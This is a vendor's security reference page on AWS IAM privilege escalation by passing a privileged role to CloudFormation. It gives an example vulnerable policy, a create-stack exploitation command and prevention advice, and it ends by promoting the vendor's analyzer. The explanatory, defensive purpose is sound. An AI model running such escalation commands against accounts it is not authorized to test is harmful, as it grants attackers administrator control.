All IAM escalation methodsCritical severity
AWS IAM privilege escalation • iam:PassRole + cloudformation:CreateStack

iam:PassRole + CloudFormation Privilege Escalation

CloudFormation can act with a service role you pass to it, performing every action in the template as that role. With iam:PassRole and cloudformation:CreateStack, an attacker passes a privileged role and deploys a template that does whatever that role allows — including granting themselves admin.

Permissions an attacker needs

  • iam:PassRole
  • cloudformation:CreateStack

How the escalation works

  • The attacker finds a privileged role they can pass (for example one with IAM or admin permissions).
  • They create a stack with --role-arn set to that role and a template that performs privileged actions (e.g. attach AdministratorAccess to their user).
  • CloudFormation executes the template as the passed role, carrying out the actions on the attacker’s behalf.

Example vulnerable policy

A policy like this grants the dangerous permission. Paste your own policy into the free AI-Powered IAM analyzer to see if you are exposed.

{
  "Version": "2012-10-17",
  "Statement": [
    {
      "Effect": "Allow",
      "Action": [
        "iam:PassRole",
        "cloudformation:CreateStack"
      ],
      "Resource": "*"
    }
  ]
}

Example exploitation

For illustration only — run against accounts you own or are authorized to test.

aws cloudformation create-stack \
  --stack-name esc \
  --template-body file://escalate.json \
  --role-arn arn:aws:iam::123456789012:role/privileged-role \
  --capabilities CAPABILITY_NAMED_IAM

How to detect and prevent it

  • Scope iam:PassRole to specific roles and add iam:PassedToService = cloudformation.amazonaws.com.
  • Use least-privileged CloudFormation service roles scoped to the resources a stack legitimately manages.
  • Review who can pass roles to CloudFormation; treat it as equivalent to those roles’ permissions.

FAQ

Does this work without a service role?

Without a passed --role-arn, CloudFormation uses the caller’s own permissions, so there is no escalation. The risk comes specifically from passing a more privileged service role.

Related escalation methods

Check your IAM policies for this — free

Shieldly's AI-Powered analyzer flags privilege-escalation paths, wildcards, and risky PassRole in seconds. No signup, no AWS credentials. Also ships as CLI, VS Code extension, GitHub Action, and CDK Guard.

Amazon Web Services (AWS) is a trademark of Amazon.com, Inc. Shieldly is not affiliated with, endorsed by, or sponsored by Amazon Web Services.